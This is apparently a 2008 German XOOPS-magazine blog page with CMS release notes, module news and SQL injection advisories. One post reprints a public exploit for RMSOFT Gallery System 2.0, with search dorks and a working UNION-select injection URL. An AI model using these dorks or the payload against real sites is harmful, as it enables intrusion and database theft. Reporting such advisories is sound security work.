XOOPS-magazine
Hauptmenu
Sidebar Navigation
Kategorien
Monatsarchive
RSS Feed
suck my

Breadcrumbs: Startseite

Social-Bookmarks
 

Release of ImpressCMS 1.0 ‘Janus’ Release Candidate 2

english.gif german.gif

Release of ImpressCMS 1.0 -Janus- Release Candidate 2as ImpressCMS Projekt verkündet mit Stolz die neue Version von ImpressCMS 1.0 “JanusRelease Candidate 2!

Diese Version von ImpressCMS wurde gegenüber der Release Candidate verbessert. Dieses enthält weiterhin unser Engagement für einen stabilen Weg der Migration für XOOPS Benutzer und einem einfach zu bedienenden CMS für neue Benutzer.

Bitte beachten Sie, diese Release Candidate 2 ist nicht für die Verwendung von offiziellen Webseiten geeignet. Aber wir ermutigen jeden die RC-Version zu testen! Wenn keine groben Fehler gefunden werden, gibt es ab heute in einer Woche die FINAL-VERSION!

Verbesserungen und Fehlerbehebung in der Release Candidate 2:

  • Added : New smarty variable now available, < {$icmsLang}> representing the selected language. For example, if French is the current language selected by the user, then the value of this variable will be “french”. (malanciault/davidl2)
  • Fixed : Revision 955: Display issues with impresstheme. (Snow)
  • Fixed : #1891588: Timezone offset empty (compatibility issue with versions of PHP aswell as operating system when using floats. (changed to an integer value instead). (vaughan
  • Fixed : #1892430: Typo in language/english/user.php (malanciault/jegelstaff)
  • Download der Vollversion und des Upgrades-Pakets gibt es hier in deutscher Sprache.

    XOOPS 2.0.18.1 Released

    english.gif german.gif

    XOOPS 2.0.18.1 ReleasedNach dem RC haben die XOOPS Entwickler nun die Version 2.0.18.1 veröffentlicht. Sie behebt eine Reihe von kleinen Fehlern sowie ein URL-redirect Problem.

    Änderungen (Changelog):

    ============================
    2008/02/16: Version 2.0.18.1
    ============================
    - Fixed #1854203 : XoopsTree::getNicePathFromId Add separator only if necessary (dugris)
    - Fixed #1854392 : Add missing index.html files (edomch/dugris)
    - Fixed bug #1847253 : Display the website url in profil (dugris)
    - Fixed bug #1867242 : HTML was sanitized improperly (phppp/mcdonald3072)
    - Fixed bugs in theme zetagenesis css files (kris_fr/phppp/mowaffak)
    - Fixed bug #1867843: can’t login to banner page (phppp/mowaffak)
    - Fixed bug #1880146: javascript variables are declared without “var” (phppp/cpks)
    - Fixed bug #1881197: Function does not always return a value (phppp/cpks)
    - Fixed bug #1881236: URL Redirection phishing (phppp/dsec.ru)
    - Fixed bug #1881236: local file inclusion (phppp/dsec.ru)
    - Fixed bug #1890044: redirect page is not well handled upon failure of avatar upload (phppp)

    - Improved: cosmetic update for administration (dugris)
    - Improved: use xoops_error to display the error, in upload avatar (dugris)
    - Improved: Show the error message for uploads ranks (dugris)
    - Improved: Xoops Installer, xhtml/css compliance (julionc)
    - Improved: Turned enableRegenerateId off in XOOPS session to avoid problems with IEs (phppp)
    - Improved: formulating smiley display (phppp/skinnali/mowaffak)
    - Improved: fixed assigned by reference warnings (phppp/marco/blackrx)

    9 SQL Injection Vulnerability in modules

    english.gif german.gif

    SQL Injection Vulnerability in a many modules

    1 XOOPS Tiny Event ‘print’ Option SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-21 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27931
    2 XOOPS ‘prayerlist’ Module ‘cid’ Parameter SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-21 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27934
    3 XOOPS eEmpregos Module ‘index.php’ SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-20 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27905
    4 XOOPS ‘classifieds’ Module ‘cid’ Parameter SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-19 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27895
    5 XOOPS ‘vacatures’ Module ‘cid’ Parameter SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-19 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27889
    6 XOOPS ‘badliege’ Module ‘id’ Parameter SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-19 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27892
    7 XOOPS ‘events’ Module ‘id’ Parameter SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-19 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27890
    8 XOOPS ’seminars’ Module ‘id’ Parameter SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-19 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27891
    9 XOOPS myTopics Module ‘print.php’ SQL Injection Vulnerability (Vulnerabilities)
    Last modified on: 2008-02-18 00:00:00 MST
    URL: http://www.securityfocus.com/bid/27861

    Release of ImpressCMS 1.0 -Janus- Release Candidate

    english.gif german.gif

    Release of ImpressCMS 1.0 -Janus- Release CandidateImpressCMS nimmt Form und Stabilität an Soeben wurde der Release Candidate für die Version 1.0 veröffentlicht. Diese Version von ImpressCMS wurde gegenüber der BETA2 verbessert. Dieses enthält weiterhin unser Engagement für einen stabilen Weg der Migration für XOOPS Benutzer und einem einfach zu bedienenden CMS für neue Benutzer.

    Bitte beachten Sie, diese Release Candidate ist nicht für die Verwendung von offiziellen Webseiten geeignet. Aber wir ermutigen jeden die RC-Version zu testen! Eine Final-Version könnte schon kommende Woche folgen.

    Verbesserungen und Fehlerbehebung der RC

  • Fixing a related to a query when inserting a user
  • Enthalten in diesem ersten Release

  • Neues Administrations-Interface
  • Integrierte Multilanguage-Fähigkeit
  • Neue Positionen für benutzerdefinierten Block
  • Verbesserter Installationsassistent welcher automatisch einen TRUST_PATH anlegt
  • Neue Standard-Themen und gültige xHTML Templates
  • Und eine MENGE mehr! Weitere Infos gibt es in der Changelog bei ImpressCMS.org
  • Download der Vollversion und des Upgrades-Pakets gibt es hier in deutscher Sprache.

    OpenID module for Xoops Cube

    english.gif german.gif

    OpenID module for Xoops CubeEs ist geschafft. Das Modul OpenID wurde in der Version 0.2 veröffentlicht. Es wurde hierzu  die PHP Library ‘php-openid-2.0.0′ benutzt. Das Modul steht unter der GPL und kann auf der Autorenwebseite geladen werden. Die Installation ist nicht für Einsteiger geeignet, wenn man aber Zeit und Motivation mit bringt, dann geht es schon:

    INSTALLATION:
    - Datei entpacken
    - vorgesehene Daten in das Modulverzeichnis und TRUST_PATH kopieren
    - das Verzeichnis ‘_php_consumer’ benötigt Schreibrechte (chmod777)
    - jetzt das Modul normal installieren
    (Xoopscube, nicht vergessen die Blöcke zu installieren)
    - Gäste benötigen Zugriff auf das Modul (Gruppenberechtigung)

    Download + Test: http://www.sakimura.org

    new Version: social-bookmarks Module

    english.gif german.gif

    social-bookmarks Module - new VersionEine neue Version des Modules “social-bookmarks” wurde fertig gestellt. Das Modul wurde erfolgreich auf allen Systemen getestet: ImpressCMS, Simple-Xoops, Xoops und Xoops-Cube! Eine Hilfe zum Modul befindet sich direkt im Modul (zu sehen nach der Installation)!
    Hier wurde ein neues, wichtiges Feature hinzugefügt, die einzelnen Bookmarks können nun über die Moduleinstellungen auf aktiv oder inaktiv gesetzt werden.

    Changelog
    - automatische Versionsanzeige im Modul-Backend (sato-san)
    - Block-Template geändert, damit der Webmaster das Design bestimmen kann (sato-san)
    - index-Template entfernt, wurde nicht genutzt (sato-san)
    - Optionen für Einstellungen (Muki)
    - Optionen fertig gestellt (Alfred)
    - URL für Icons angepasst (Alfred)
    - Mr.Wong Icon wurde angepasst, da neues Logo (sato-san)
    - URL für die Hilfe-Bilder im Backend angepasst (sato-san)
    - unbenutzte Dateien aufgeräumt (sato-san)

    Download
    Das neue Modul “social-bookmarks 0.3″ kann über Sourceforge.net geladen werden.

    Danke
    Mein besonderen Dank möchte ich hier auch an Alfred und Muki aussprechen, ohne die beiden wäre es nicht zu diesem Modul gekommen!

    RMSOFT Gallery System 2.0 - SQL Injection Vulnerability

    english.gif german.gif

    RMSOFT Gallery System 2.0 - SQL Injection Vulnerability

    Details : ExploitAlert
      Topic : RMSOFT Gallery System 2.0 (images.php id) SQL Injection Vulnerability
      ExploitAlert : 3336
      Credit : you_kn0w
      Date : 5.2.2008
      Download

      Exploit Code :

    #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=#
    # ~Author: you_kn0w #
    # ~Contact: you-know[at]linuxmail.org #
    # ~Website: www.youknowz.info #
    # ~Script: RRMSOFT Gallery #
    # ~Bug: RRMSOFT Gallery Remote SQL Injection #
    #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
    # Script Information #
    #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
    # #
    # Script name: RRMSOFT Gallery System #
    # Script site: http://www.xoopsmexico.net #
    # Script get: www.xoopsmexico.net/modules/rmdp#
    # Description: PHP media gallery System #
    # Version: 2.0 #
    #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#

    # [-]Dorks:
    intext:Powered by RMSOFT GS 2.0
    inurl:modules/rmgs/images.php

    # [+]How To Exploit:

    http://[target].com/[path]/modules/rmgs/images.php?q=user&id
    =1999/**/union/**/all/**/select/**/1,1,concat(database(),0×202D20
    ,user()),1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/
    *

    # [+]Greetz:

    Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo

    //you_kn0w
    #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

    Quelle:http://securityreason.com/exploitalert/3336

    Text Disappears in Text Box when clicking

    english.gif german.gif

    In meiner Webseite möchte ich eine Textbox haben und wenn ein User dort hineinklickt, dann soll der voreingestellte Text automatisch verschwinden. Damit ich das für den Block der Suche umsetzen kann, muss ich nur das Template (system_block_search.html) dazu ein bisschen bearbeiten.
    vorher
    vorher
    nacher
    nacher

    Das kann mit jedem Textfeld genutzt werden.

    SWF = http://www.xoops-magazine.com/uploads/wp-content/2008/02/mouse-over-text.swf

    XOOPS on Chip.de

    english.gif german.gif

    XOOPS on Chip.deJetzt auch bei Chip.de! Das CMS XOOPS kann nun auch über das bekannte deutsche Onlineportal geladen werden. XOOPS wird hier vorgestellt und die Redaktion befindet das CMS als sehr gut!

    Zitat:
    Fazit: Möchten Sie größere Web-Projekte realisieren, werden Sie wohl kaum um ein CMS herumkommen. Mit XOOPS haben Sie ein leistungsfähiges Werkzeug, dieses Ziel zu erreichen.

    Ich kann mir gut vorstellen, das auch ein Artikel in der Zeitschrift folgen wird. Lassen wir uns überraschen.

    Good news for a completely new module - Xigg

    english.gif german.gif

    Good news for a completely new module - XiggXigg (version 0.1.9a2) - ein Digg.com Klone, für Deine Webseite! Binde die User in Deiner Webseite ein und nutze die neuen Funktionen. Jeder User Deiner Webseite kann für die Artikel bei Gefallen eine Stimme abgeben (Xigg it). Zu jedem Artikel können natürlich auch Kommentare geschrieben werden. Da das Modul über viele Erweiterungen (Plugin) verfügt, kann das Modul noch aufgepeppt werden.

    Für die Artikel können viele Kategorien und Unterkategorien erstellt werden. Außerdem können zu jedem Artikel sogenannte Tags hinzugefügt werden. Diese Tags können in einem Block als ein Wortwolke dargestellt werden. Das Modul hat im gesamten 7 Blöck zur Darstellung.
    Plugins:
    - Prototype (für Ajax-Funktionen)
    - ExternalLink (kl. Icon für externe Links)
    - LinkBubbler (Popup für Webseitenscreenshots)
    - verschiedene Editoren (BB-Code, TinyMCE, Text Wiki, HTML)
    - Akismet (Anti-Samp)
    - Services_Trackback
    - Google Blog Search Ping

    Das Modul funktioniert mit XOOPS, XOOPS Cube, ImpressCMS und simple-xoops!!

    Einen kleinen Nachteile hat das Modul noch: Der TinyMCE und Prototype dürfen nicht zusammen aktiviert werden, hier gibt es noch einen Bug. Der Entwickler ist informiert und wird den Fehler beheben.

    Jetzt das Modul Downloaden!

    Powered by XOOPS 2.0.16 © 2001-2007 The XOOPS Project

    Design by XOOPS-magazine.com Powered by XOOPS 2.0.16 | Ref: 1220636727
    Impressum / Disclaimer Impressum | Kontakt / Contact Kontakt | Xoops Headlines all Xoops-Headlines | Xoops Headlines Sitemap | Xoops Headlines Stats

    Admin-Infos: 1.121 Sekunden / secounds + 3 Abfragen / queries
    Special thanks to Link > matchan matchan and Link > kruxmux kruxmux!



    xoops topliste